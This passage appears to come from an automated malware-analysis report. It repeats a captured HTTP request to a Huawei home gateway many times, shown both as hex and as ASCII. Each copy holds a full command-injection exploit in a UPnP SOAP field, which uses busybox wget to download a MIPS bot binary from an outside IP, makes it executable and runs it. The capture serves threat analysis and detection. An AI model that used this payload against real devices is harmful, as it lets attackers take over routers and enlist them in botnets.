6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * 